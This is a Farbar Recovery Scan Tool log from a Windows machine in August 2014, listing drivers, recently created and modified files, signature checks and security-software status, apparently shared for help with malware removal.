U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
R3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
U3 kxrdrkod; \??\C:\Users\SAVAS~1.KYR\AppData\Local\Temp\kxrdrkod.sys [X]
U3 mbr; \??\C:\Users\SAVAS~1.KYR\AppData\Local\Temp\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-26 09:34 - 2014-08-26 09:34 - 00025347 _____ () C:\ComboFix.txt
2014-08-26 09:30 - 2014-08-26 09:30 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\AVG10
2014-08-26 09:26 - 2014-08-26 09:26 - 00703392 _____ () C:\Windows\system32\commonpriv.log
2014-08-26 09:26 - 2014-08-26 09:26 - 00006552 _____ () C:\Windows\system32\commonpub.log
2014-08-26 09:26 - 2014-08-26 09:26 - 00000000 _____ () C:\Windows\system32\commonpub.log.lock
2014-08-26 09:26 - 2014-08-26 09:26 - 00000000 _____ () C:\Windows\system32\commonpriv.log.lock
2014-08-25 16:22 - 2014-08-25 16:21 - 00001052 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 16:54 - 2014-08-26 14:19 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-25 17:03 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-26 09:26 - 00044440 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-26 09:34 - 00000000 ____D () C:\Qoobox
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-25 13:39 - 00001564 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-26 09:29 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-25 16:32 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-26 14:19 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-26 14:18 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-26 14:04 - 2014-07-18 00:39 - 01701450 _____ () C:\Windows\WindowsUpdate.log
2014-08-26 13:26 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-26 13:26 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-26 09:34 - 2014-08-26 09:34 - 00025347 _____ () C:\ComboFix.txt
2014-08-26 09:34 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-26 09:32 - 2006-11-02 06:33 - 00690960 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-26 09:30 - 2014-08-26 09:30 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\AVG10
2014-08-26 09:30 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-26 09:29 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-26 09:29 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-26 09:28 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-26 09:26 - 2014-08-26 09:26 - 00703392 _____ () C:\Windows\system32\commonpriv.log
2014-08-26 09:26 - 2014-08-26 09:26 - 00006552 _____ () C:\Windows\system32\commonpub.log
2014-08-26 09:26 - 2014-08-26 09:26 - 00000000 _____ () C:\Windows\system32\commonpub.log.lock
2014-08-26 09:26 - 2014-08-26 09:26 - 00000000 _____ () C:\Windows\system32\commonpriv.log.lock
2014-08-26 09:26 - 2014-08-22 16:12 - 00044440 _____ () C:\Windows\PFRO.log
2014-08-26 09:26 - 2011-07-10 19:26 - 00000000 ____D () C:\ProgramData\AVG10
2014-08-26 09:26 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-26 09:26 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-26 08:38 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-26 08:38 - 2006-11-02 06:22 - 43515904 _____ () C:\Windows\system32\config\software.bak
2014-08-26 08:38 - 2006-11-02 06:22 - 35389440 _____ () C:\Windows\system32\config\COMPON~3.bak
2014-08-26 08:38 - 2006-11-02 06:22 - 21757952 _____ () C:\Windows\system32\config\system.bak
2014-08-26 08:38 - 2006-11-02 06:22 - 01048576 _____ () C:\Windows\system32\config\default.bak
2014-08-26 08:38 - 2006-11-02 06:22 - 00262144 _____ () C:\Windows\system32\config\security.bak
2014-08-26 08:38 - 2006-11-02 06:22 - 00262144 _____ () C:\Windows\system32\config\sam.bak
2014-08-26 08:37 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-26 08:25 - 2011-02-13 09:42 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-08-26 08:23 - 2006-11-02 07:18 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-08-25 17:03 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-25 16:32 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-25 16:21 - 2014-08-25 16:22 - 00001052 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-25 13:39 - 2014-08-22 13:25 - 00001564 _____ () C:\Windows\setupact.log
2014-08-25 09:54 - 2011-03-06 00:06 - 00047104 _____ () C:\Users\savas.kyriakidis\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-26 09:39
 
==================== End Of Log ============================

Addition

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-26 14:19:50
Running from F:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
